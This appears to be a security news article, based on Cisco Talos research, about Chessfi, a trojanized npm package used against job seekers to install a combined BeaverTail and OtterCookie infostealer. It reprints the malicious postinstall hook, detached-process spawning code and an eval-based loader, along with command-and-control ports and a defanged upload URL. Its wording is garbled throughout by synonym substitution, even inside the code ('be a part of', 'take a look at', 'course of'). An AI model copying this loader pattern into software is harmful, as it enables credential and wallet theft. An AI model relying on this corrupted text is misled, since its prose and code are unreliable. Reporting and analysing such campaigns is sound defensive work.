A brand new information-stealer has emerged focusing on job seekers with a trojanized Node.js software named Chessfi.
Delivered through a modified npm package deal hosted on the official repository, the malware blends two beforehand separate instruments—BeaverTail and OtterCookie—right into a unified JavaScript payload.
Victims are lured by way of faux employment provides and requested to put in the appliance beneath the guise of a coding evaluation, unknowingly triggering malicious scripts that harvest credentials, cryptocurrency wallets and person exercise.
Cisco Talos analysts recognized the marketing campaign when investigating uncommon outbound visitors from a compromised system.
They discovered {that a} submit‐set up script within the node-nvm-ssh package deal spawns a hidden little one course of that deobfuscates and evaluates a big JavaScript payload.
Node-nvm-ssh an infection path (Supply – Cisco Talos)
This payload merges BeaverTail’s browser extension enumeration and InvisibleFerret Python downloader with OtterCookie’s distant shell, file exfiltration, clipboard and now keylogging modules.
As soon as executed, the mixed malware establishes a connection to a command-and-control server over socket.io.
The attacker can remotely situation instructions, steal recordsdata matching a variety of patterns—from .env and .docx to cryptocurrency extension directories—and execute shell instructions.
In the meantime, the keylogging element captures each keystroke and takes periodic desktop screenshots earlier than importing them to the C2 server together with clipboard contents.
Sustained community exercise
Contaminated methods present sustained community exercise on high-numbered TCP ports, typically 1418 for socket.io and 1478 for keylog uploads.
The malware creates a short lived folder named windows-cache and writes keystrokes to 1.tmp each second, whereas screenshots are saved as 2.jpeg each 4 seconds.
Utilizing the Node.js packages node-global-key-listener, screenshot-desktop and sharp, the module configures listeners for key occasions and schedules screenshot captures, then bundles and sends the information to hxxp://172.86.88.188:1478/add.
The keylogger listens for the keyboard and mouse key presses and saves them right into a file (Supply – Cisco Talos)
Along with credential theft and distant shell entry, the marketing campaign’s an infection mechanism employs a multi-stage chain to evade detection. After cloning the repository, a malicious postinstall script in package deal.json executes the skip script:
“scripts”: {
“postinstall”: “npm run take a look at npm run transpile npm run skip”
}
The skip command invokes node testfixtures/eval, which by default hundreds index.js. That script spawns a indifferent little one course of working file15.js:
const filePath = path.be a part of(__dirname, ‘node_modules’, ‘file15.js’);
const little one = spawn(course of.execPath, [filePath], { indifferent: true, stdio: ‘ignore’ });
Lastly, file15.js reads and evaluates the content material of take a look at.listing utilizing eval, revealing the mixed BeaverTail and OtterCookie modules:
const fs = require(‘fs’);
const path = require(‘path’);
const filePath = path.be a part of(__dirname, ‘take a look at.listing’);
fs.readFile(filePath, ‘utf8’, (err, information) => { eval(information); });
This convoluted chain—cloning a Git repository, working benign-looking npm scripts, spawning hidden processes and dynamically evaluating an obfuscated payload—underscores the delicate an infection mechanism.
By merging BeaverTail’s stealthy Python payload downloader and OtterCookie’s modular information-stealer, Well-known Chollima has crafted a flexible malware that leverages acquainted developer workflows to compromise unsuspecting victims.
Comply with us on Google Information, LinkedIn, and X to Get Extra Immediate Updates, Set CSN as a Most popular Supply in Google.
